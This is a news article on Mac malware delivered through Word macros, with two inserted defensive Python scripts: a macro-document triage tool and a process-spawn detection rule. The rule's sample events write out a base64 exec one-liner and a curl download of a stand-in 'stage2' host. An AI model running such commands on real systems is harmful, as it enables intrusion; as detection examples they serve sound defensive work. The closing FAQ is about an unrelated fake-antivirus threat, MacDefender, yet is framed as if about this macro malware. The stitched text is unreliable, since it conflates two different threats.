Mac Malware Reportedly First To Infect Machines Using Macros

Researchers have identified what they believe is the first in-the-wild instance of hackers using malicious macros in Word documents to execute malware on Mac computers, instead of Windows-based machines.


Patrick Wardle, director of research at the cybersecurity company Synack, reported in a blog post this week that multiple Mac security researchers, admins, and malware experts collectively analyzed a newly discovered malicious Word document with the file name “U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm”.


Recipients who open this document and choose to enable macros on the resulting pop-up are infected with embedded Python code that is virtually identical to EmPyre, an open source Mac and Linux post-exploitation agent.
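The infection chain above starts with a macro-enabled Word file (.docm) whose VBA project drops and runs Python. A first triage step a defender can automate is a structural check of the document container itself: OOXML files are zip archives, and a macro-enabled document declares itself through its content type and carries a word/vbaProject.bin part. The following script is an added example written for this article, not code from Wardle's post or from the malware; it constructs a minimal sample package in memory (no real VBA is included, the vbaProject.bin is a placeholder) and reports the macro indicators. It does not decompress the VBA source; for that, a tool such as olevba from oletools is the usual next step.

```python
import io
import os
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML content types that mark a Word document or template as macro-enabled
MACRO_ENABLED_TYPES = {
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-word.template.macroEnabledTemplate.main+xml",
}
VBA_PROJECT_TYPE = "application/vnd.ms-office.vbaProject"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"


def triage_office_document(data: bytes, filename: str) -> dict:
    """Return container-level macro indicators for an OOXML (zip-based) Word file."""
    findings = {
        "is_ooxml": False,
        "has_vba_project": False,
        "macro_enabled_content_type": False,
        "extension_mismatch": False,
        "parts": [],
    }
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # legacy OLE2 .doc, or not an Office file at all
    findings["is_ooxml"] = True
    names = set(zf.namelist())
    findings["parts"] = sorted(names)
    findings["has_vba_project"] = any(n.lower().endswith("vbaproject.bin") for n in names)

    # [Content_Types].xml declares the main document type and any VBA project part
    if "[Content_Types].xml" in names:
        root = ET.fromstring(zf.read("[Content_Types].xml"))
        for el in root.iter(CT_NS + "Override"):
            ctype = el.get("ContentType", "")
            if ctype in MACRO_ENABLED_TYPES:
                findings["macro_enabled_content_type"] = True
            if ctype == VBA_PROJECT_TYPE:
                findings["has_vba_project"] = True

    # A VBA project inside a file whose extension claims "no macros" deserves a closer look
    ext = os.path.splitext(filename)[1].lower()
    findings["extension_mismatch"] = findings["has_vba_project"] and ext not in {".docm", ".dotm"}
    return findings


def build_sample_docm(with_macros: bool) -> bytes:
    """Construct a minimal OOXML package in memory (sample data, not a real document)."""
    main_type = (
        "application/vnd.ms-word.document.macroEnabled.main+xml"
        if with_macros
        else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    )
    overrides = f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
    if with_macros:
        overrides += f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_PROJECT_TYPE}"/>'
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f"{overrides}</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # Placeholder bytes standing in for a VBA project (not a real OLE container)
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 32)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [("report.docm", build_sample_docm(True)),
                       ("report.docx", build_sample_docm(False))]:
        result = triage_office_document(blob, name)
        print(name, {k: v for k, v in result.items() if k != "parts"})
```

To run it on a real attachment, read the file into bytes and pass it with its filename to triage_office_document; a true result for has_vba_project or macro_enabled_content_type on an inbound document is the cue to quarantine it and extract the VBA with a dedicated tool.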


Despite serving a legitimate purpose – the automation of tasks – macros are often abused by developers of Windows-based malware, who have long banked on the fact that users either enable macros by default or dismiss warnings to disable them.


“Using Word macros as an infection vector exploits the weakest link: humans,” said Wardle, in an email interview with SC Media. “As operating systems and applications become harder to exploit (due to more secure coding practices, built-in exploitation mitigations, etc.), humans remain the constant.”


Other reasons macros make popular cyberweapons: they work across platforms, and “as legitimate functionality, can't be fixed by a patch from the vendor,” Wardle added.


After performing a systems check for Little Snitch – Mac OS X's host-based application firewall product – the malware downloads a second-stage component that maintains persistence on infected machines. This component can run a variety of modules that are capable of operating a victim's webcam, dumping the keychain and viewing a user's browser history, among other malicious activities.
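Because macros are legitimate functionality that no vendor patch removes, the practical detection point is behavioural: an Office application should essentially never be the parent of a script interpreter or a download tool. The script below is an added example for this article, not code from the researchers or from any EDR product; it runs a simple parent/child rule over constructed process-creation records (the field names are my own, chosen to resemble what an endpoint agent would log) and raises the severity when the child is handed inline code, a URL or base64 material on its command line, which is how a macro-launched first stage typically fetches its second stage.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcessEvent:
    """One process-creation record (constructed shape, not a specific product's schema)."""
    host: str
    parent_name: str
    child_name: str
    cmdline: str


OFFICE_APPS = {"microsoft word", "microsoft excel", "microsoft powerpoint"}
INTERPRETERS = {"python", "python2", "python3", "osascript", "sh", "bash", "zsh",
                "perl", "ruby", "curl"}


def evaluate(event: ProcessEvent) -> Optional[dict]:
    """Return an alert when an Office app spawns an interpreter, otherwise None."""
    if event.parent_name.lower() not in OFFICE_APPS:
        return None
    if event.child_name.lower() not in INTERPRETERS:
        return None
    reasons = [f"{event.parent_name} spawned {event.child_name}"]
    cmd = f" {event.cmdline.lower()} "
    # Inline code (-c / -e), URLs and base64 blobs on the command line are the
    # usual signs of a macro-launched first stage pulling down the next stage
    if " -c " in cmd or " -e " in cmd:
        reasons.append("inline script passed on the command line")
    if "http://" in cmd or "https://" in cmd:
        reasons.append("URL on the command line (possible second-stage download)")
    if "base64" in cmd:
        reasons.append("base64-encoded payload")
    severity = "high" if len(reasons) > 1 else "medium"
    return {"host": event.host, "severity": severity, "reasons": reasons}


def scan(events: List[ProcessEvent]) -> List[dict]:
    """Run the rule over a batch of events and keep only the hits."""
    return [a for a in (evaluate(e) for e in events) if a is not None]


# Constructed sample events; the decoded base64 below is just the word "pass"
SAMPLE_EVENTS = [
    ProcessEvent("mac-01", "Microsoft Word", "python",
                 "python -c \"import base64; exec(base64.b64decode('cGFzcw=='))\""),
    ProcessEvent("mac-02", "Microsoft Word", "python", "python /tmp/update.py"),
    ProcessEvent("mac-03", "Terminal", "python3", "python3 -c 'print(1)'"),
    ProcessEvent("mac-04", "Microsoft Word", "Microsoft AutoUpdate", "Microsoft AutoUpdate"),
    ProcessEvent("mac-05", "Microsoft Excel", "curl", "curl -s https://example.invalid/stage2"),
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["severity"].upper(), "; ".join(alert["reasons"]))
```

The medium-severity hit (Word launching a plain script path) is the one worth tuning carefully in a real deployment: it is rare enough on managed Macs to be worth a ticket, but a blanket block would also catch the few legitimate add-ins that shell out.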


The command-and-control server from which this persistence module was downloaded is located in Russia and has a reputation for hosting phishing attacks, Wardle continued. (Presumably, phishing is the malicious Word document's method of distribution.)

FAQ

Q: How bad is the Mac malware scare?
A: Windows users are familiar with the fake anti-malware ruse, but this is the first time it's been targeted at the smaller Mac market. CNET tells you what MacDefender is and what it means for Macintosh users.

Q: Does this mean the Mac is not secure?
A: No. It means that criminals who used to focus on Windows machines to reach the most potential victims are now targeting Mac too. Around the same time MacDefender first appeared, a new crimeware kit showed up on criminal underground sites that makes it easy to write botnet malware for Mac OSX, according to security blogger Brian Krebs.

Q: How widespread is the malware?
A: While it's definitely not an epidemic, it does seem to be hitting the radar more than other Mac malware has in the past. Ed Bott at ZDNet reports that an AppleCare support rep told him call volume on the support line was four to five times higher than normal and most of the calls were about the malware.

Q: What about sending files to Windows users?
A: Some users choose to run antivirus such as ClamXav on their Mac to scan for Windows viruses (it also scans for Mac threats), so the Mac user can't pass a virus-infected file to a Windows user. However, a more prudent approach is for every Windows user to be protected by their own AV software, to guard against viruses from any source, not just those that might come from a Mac user.

Q: What is the malware?
A: MacDefender, also known as Mac Security and Mac Protector, is a fake antivirus program that is designed to scare people into thinking that their computers are infected with malware and that they have to pay with a credit card to clean the machine up. People get infected with the rogue antivirus programs when they happen to stumble upon Web sites hosting the malware. The malicious sites are created solely to distribute malware and they are search engine optimized so they will appear high up in search results.